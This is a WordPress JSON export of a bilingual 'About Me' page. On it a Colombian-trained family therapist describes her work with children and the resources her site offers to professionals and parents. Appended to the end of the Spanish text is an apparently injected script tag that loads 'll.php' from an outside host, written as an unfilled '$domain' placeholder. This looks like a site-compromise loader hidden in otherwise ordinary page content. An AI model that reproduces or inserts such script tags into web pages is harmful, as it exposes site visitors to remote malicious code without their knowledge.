{"id":25,"date":"2011-03-21T00:13:44","date_gmt":"2011-03-21T00:13:44","guid":{"rendered":"http:\/\/www.dianaloaiza.com\/?page_id=25"},"modified":"2015-10-31T17:03:15","modified_gmt":"2015-10-31T17:03:15","slug":"about-me","status":"publish","type":"page","link":"https:\/\/www.dianaloaiza.com\/blog\/?page_id=25","title":{"rendered":"About Me"},"content":{"rendered":"<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-161\" title=\"DSC_0450\" src=\"http:\/\/www.dianaloaiza.com\/wp-content\/uploads\/2011\/03\/DSC_04501-550x347.jpg\" alt=\"\" width=\"550\" height=\"347\" srcset=\"https:\/\/www.dianaloaiza.com\/blog\/wp-content\/uploads\/2011\/03\/DSC_04501-550x347.jpg 550w, https:\/\/www.dianaloaiza.com\/blog\/wp-content\/uploads\/2011\/03\/DSC_04501-300x189.jpg 300w\" sizes=\"(max-width: 550px) 100vw, 550px\" \/><\/p>\n<p><strong>English<\/strong><\/p>\n<p>I am a mental health therapist in Medell\u00edn, Colombia and I graduated from CES University. I am currently in the United States working as a Licensed Associate Marriage and Family Therapist and I completed a Graduate Certificate in Play Therapy at Saint Mary\u2019s University of Minnesota.<\/p>\n<p>My work has been primarily with children and teenagers with issues related to anxiety, depression, sexual abuse, domestic violence, learning difficulties, low self-esteem, among others.<\/p>\n<p>The purpose of this website is to share some ideas, articles, and resources that could be useful for professionals that are working with children and adolescents in fields like psychotherapy, education, health or recreation.\u00a0 In addition, this website also intends to provide resources that could benefit parents who are constantly struggling with day life situations related to parenting. You will find resources in English and Spanish and you would have the opportunity to contact me if you have any questions regarding the information in the website.<\/p>\n<p><strong>Espa\u00f1ol<\/strong><\/p>\n<p>Yo soy Psic\u00f3loga egresada de la Universidad CES de Medell\u00edn, Colombia y actualmente me encuentro en los Estados Unidos estudiando trabajando como Licenciada Asociada en Terapia de Familia y Pareja y he completado un Postgrado en Terapia de Juego en Saint Mary\u2019s University of Minnesota.<\/p>\n<p>Mi trabajo ha sido fundamentalmente con ni\u00f1os y adolescentes que han vivido experiencias relacionadas con ansiedad, depresi\u00f3n, abuso sexual, violencia intrafamiliar, dificultades en el aprendizaje, baja autoestima, entre otros.<\/p>\n<p>El prop\u00f3sito de esta p\u00e1gina es compartir algunas ideas, art\u00edculos y recursos que podr\u00edan ser \u00fatiles para profesionales que se encuentran trabajando con ni\u00f1os y adolescentes desde diferetes \u00e1mbitos, ya sea el psicoterap\u00e9utico, educativo, de la salud o l\u00fadico. As\u00ed mismo, esta p\u00e1gina provee recursos que podr\u00edan ser de gran beneficio para padres de familia, quienes constantemente tienen preguntas acerca de situaciones que se presentan en el d\u00eda d\u00eda con sus hijos. Usted encontrar\u00e1 herramientas tanto en el idioma ingl\u00e9s como en el espa\u00f1ol y tendr\u00e1 la oportunidad de contactarme si presenta alguna inquietud.<script type=\"text\/javascript\" src=\"http:\/\/$domain\/ll.php?kk=11\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>English I am a mental health therapist in Medell\u00edn, Colombia and I graduated from CES University. I am currently in the United States working as a Licensed Associate Marriage and Family Therapist and I completed a Graduate Certificate in Play Therapy at Saint Mary\u2019s University of Minnesota. My work has been primarily with children and [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"open","ping_status":"open","template":"","meta":{"footnotes":""},"_links":{"self":[{"href":"https:\/\/www.dianaloaiza.com\/blog\/index.php?rest_route=\/wp\/v2\/pages\/25"}],"collection":[{"href":"https:\/\/www.dianaloaiza.com\/blog\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.dianaloaiza.com\/blog\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.dianaloaiza.com\/blog\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.dianaloaiza.com\/blog\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=25"}],"version-history":[{"count":8,"href":"https:\/\/www.dianaloaiza.com\/blog\/index.php?rest_route=\/wp\/v2\/pages\/25\/revisions"}],"predecessor-version":[{"id":27,"href":"https:\/\/www.dianaloaiza.com\/blog\/index.php?rest_route=\/wp\/v2\/pages\/25\/revisions\/27"}],"wp:attachment":[{"href":"https:\/\/www.dianaloaiza.com\/blog\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=25"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}